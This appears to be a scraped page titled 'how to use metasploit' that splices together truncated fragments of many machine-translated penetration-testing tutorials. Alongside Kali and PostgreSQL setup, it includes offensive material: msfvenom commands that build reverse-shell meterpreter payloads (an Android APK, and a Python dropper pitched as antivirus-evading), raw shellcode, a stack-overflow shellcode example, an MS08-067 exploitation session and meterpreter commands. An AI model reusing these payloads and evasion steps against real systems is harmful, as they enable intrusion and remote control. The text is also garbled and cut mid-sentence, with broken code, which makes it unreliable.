how to use metasploit

Disclaimer (read only !) : The original translations of all tutorials provided by this blog are from the Internet and are only for learning and communication purposes. Do not conduct commercial communications. At the same time, do not remove this statement when reprinting. In the event of any dispute, it has nothing to do with the owner of this blog and the person who published the translation. Thank you for your cooperation! Original article link: http://k0st.wordpress.com/2011/12/18/

After installing Kali Linux First step: Switch update source for System Software update, edit system source file: Vi/etc/apt/sources.list Comment The official source, and add the domestic update source, because the domestic faster, my side is Kali Linux rolling (some people also called Kali Linux 2016.1), I chose the source of Zhong Ke (paste out the source address) Deb Http://mirrors.ustc.edu.cn/kali kali-rolling main Non-free contribDEB-SRC Http://mirrors.ustc.edu.cn/kali kali-rolling main No

This paper describes in detail the Python method of remote call Metasploit, which has a good reference value for Python learning. The implementation methods are as follows: (1) Installing the Python Msgpack class library, the data serialization standard in the MSF official documentation is the reference to Msgpack. root@kali:~# apt-get Install python-setuptools root@kali:~# Easy_install (2) Create Createdb_sql.txt: Create databa

p163 XSSFThe default Kali 2.0 does not have XSSF, first download: https://code.google.com/archive/p/xssf/downloadsUnzip the downloaded zip file, merge the data, plugins, lab and other folders into the appropriate folder in the/usr/share/metasploit-framework/, then load XSSF in Msfconsole.According to the book, but the final attack did not succeed!8 the ['...] ['exploit:windows/browser/ie_createobject'[*] Exploit execution Started, press [CTRL + C] to

-0400 Pagefile.sys 100777/rwxrwxrwx 73802 fil 2013-04-28 09:28:40-0400 payload1.exe 100666/rw-rw-rw-17 fil 2013-04-28 09:34:24-0400 readme.txt 40777/rwxrwxrwx 0 dir 2013-04-28 03:19:27-0400 Ruby Meterpreter G T 2. pwd Meterpreter > pwd \ c \ 3. Cat Meterpreter > Cat Readme.txt 4. Edit Meterpreter > Edit Readme.txt VI:/opt/metasploit/common/lib/libcrypto.so.0.9.8:no version information Available (required by/usr/lib/libpython2.6.so.1.0) V

Step 1: Download the metasploitinstallation package from the official website http://www.metasploit.com/ Step 2: Disable anti-virus software and firewall on your host Step 3: For Windows 7, go to Control Panel> region and language> area and change the area to English (us ). Otherwise, an error occurs during PostgreSQL installation and the installation may fail. Step 4: Double-click the downloaded Installation File to install it by default. Some may want to change the installation di

KaLi Connecting the PostgreSQL databaseTo see if PostgreSQL is up and not started, start with the service PostgreSQL Start command. After starting to see if the boot was successful, the port is 5432:650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M00/4C/7F/wKioL1Q-kgaSWeZXAAC1T1E06QE255.jpg "title=" 34.png "alt=" Wkiol1q-kgaswezxaac1t1e06qe255.jpg "/>After starting Metasploit, check the connection status of PostgreSQL, the command is: Db_status

Metasploit connecting the PostgreSQL database:1. Turn on the PostgreSQL service: Services PostgreSQL start2. Enter PostgreSQL, set the default user password, create a new user, set new user permissions, create a database:Sudo-u postgres psql# access to PostgreSQL Default userAlter user postgres with password ' password '; #设置默认用户的登录密码Create user ' username ' wiht password ' password ' nocreatedb; #创建带密码的新用户Create database name ' with owner = ' user na

1, first look at the PostgreSQL port, the default is automatically open, Port 7337.[Email protected]:~# netstat-tnpl |grep PostgresTCP 0 0 127.0.0.1:7337 0.0.0.0:* LISTEN 1100/postgresTCP6 0 0:: 1:7337:::* LISTEN 1100/postgres2. View the MSF configuration with database users and Passwords[Email protected]:~# cat/opt/metasploit/config/database.ymlDevelopment:www.2cto.comAdapter: "PostgreSQL"Database: "Msf3dev"Username: "MSF3"Password: "C80c3cea"port:73

First I build an Android app under Kali, that is, the APK format file, the command used is:Msfvenom-p android/meterpreter/reverse_tcp lhost= Local IP lport= listening port R >/root/rb.apkNote:-P: Refers to the payload used in this environment, the payload is the successful Android attack after the rebound connection sent to the attacker's terminal;Lhoost and Lport refer to the local bounce IP address and the local listening port;-r: Indicates the type of file to be generated;>/root/rb.apk: Indic

\x5a\x51\xff "" \xe0\x58\x5f\x5a\x8b\x12\xeb\ x86\x5d\x68\x63\x6d\x64\x00\x89 "" \xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44 "" \x24\x3c\x01\ x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56 "" \x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5 " "\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb" "\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\ x3c\x06\x7c\x0a "" \x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5 "; root@bt:~# Produced two stages

We first go to this directory to see the contents of the Database.yml file:It's the information we see.Then open Metasploit, run the db_connect instruction link database. The format is:Db_connect User name: password @127.0.0.1: Port/Database nameIn my case, that is:Db_connect MSF: Password @127.0.0.1:5432/msfAfter that, the database is connected.Below is the Nmap scan and store the results:The-ox instruction is to store nmap results in a place of deve

The attack is done under BT5 and the target program is running on an Ubuntu virtual machine.First, you need to figure out what a stack overflow attack is, read morehttp://blog.csdn.net/cnctloveyu/article/details/4236212This article is very clear, but the specific example is not very accurate, a little bit wrong.Here is an example of a modified executable that I have verified.Shell.c1#include 2 3 CharShellcode[] =4 "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" 5 "\x89\xf3\x8d

-new_fd 1\n"); - Close (NEW_FD); theExit0); the } theprintf"close-new_fd 2\n"); the Close (NEW_FD); - } theprintf"close-sockfd\n"); the Close (SOCKFD); the}This core is the recvastring function we are concerned with, which contains an obvious stack overflow vulnerability. We look specifically at:1 voidRecvastring (intnew_fd)2 {3UnsignedCharbuff[ -];4 intI=0;5printf"sp=0x%x,addr=0x%x bytes.\n", get_sp (),buff);6 intNumBytes = recv (New_fd,buff,1024x768,0);7 if(numbytes==-1

Metasploit+python generate Kill-free EXE ever the Antivirus1 Generate a bounce MSF python script under Kali, with the following command:Msfvenom-p windows/meterpreter/reverse_tcp lport=443 lhost=192.1681. 102 One-f py-o /opt/bk.py2. Copy the bk.py to the WINDOW32 system and modify it as follows (the red callout here is to modify the added code, other unchanged)From ctypes Import * Import ctypesbuf=""buf+="\xbb\x7a\x62\x0a\x22\xdb\xc9\xd9\x74\x24\x

Basic commandsImport Scan ResultsDb_import/path/file. NessusView existing IP information in the databaseMSF > Db_hosts-c address,svcs,vulns (Note: VULNS is vulnerability vulnerability abbreviation)Displays a list of detailed vulnerabilitiesMSF > Db_vulnsThe first step:Connecting to a databaseMSF > Db_connect postgres:[email protected] Database ip/msf3Step Two:Load NessusStep Three:MSF > Nessus_connect nessus Account: Password @ip: port (default = 8834)MSF > LoadView Plugin HelpMSF > Nessus_helpA

A command injection vulnerability is to have a web app execute a command that was not previously available, which could be an operating system command or a custom script program. In the "Metasploit Penetration Test Devil Training Camp" book, the author of the WordPress plug-in Zingiri the existence of a command injection vulnerability analysis, but the cause of the vulnerability of the explanation is not particularly clear. One, the vulnerability trig

Label:Service PostgreSQL Start[....] Starting PostgreSQL 9.1 database server:main[...] The PostgreSQL server failed to start. Please check the log output:2015-02-07 18:52:12 CST log:could not translate host name "localhost" and service "5432" to add Ress:name or service not known 2015-02-07 18:52:12 CST warning:could not create listen sockets for "localhost" 2015-02-07 18:52:12 CST Fatal:could Not the Create any TCP/IP sockets. [F failed!failed!/etc/hostsAdd "127.0.0.1 localhost"

Build penetration test environment Kali attack aircraft WinXP SP1 drone Start Metasploit Windows RPC-related vulnerabilities Internal-provided vulnerability attacks drone WinXP SP1 network configuration to view the NAT network segment of a virtual machine Configure IP addresses for WinXP SP1 drone Perform vulnerability Utilization Post -exploit:meterpreter> Drone's information Process Situation View 2008 Process migration to explorer.exe P

MSF > Use Exploit/windows/smb/ms08_067_netapi MSF Exploit (MS08_067_NETAPI) > Set RHOST 192.168.1.142 RHOST = 19 2.168.1.142 MSF exploit (MS08_067_NETAPI) > Set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD = windows/ Meterpreter/reverse_tcp MSF exploit (MS08_067_NETAPI) > Set lhost 192.168.1.11 lhost = 192.168.1.11 MSF exploit (ms 08_067_NETAPI) > Set target + target + exploit (MS08_067_NETAPI) > Show Options Module options (exploit /WINDOWS/SMB/M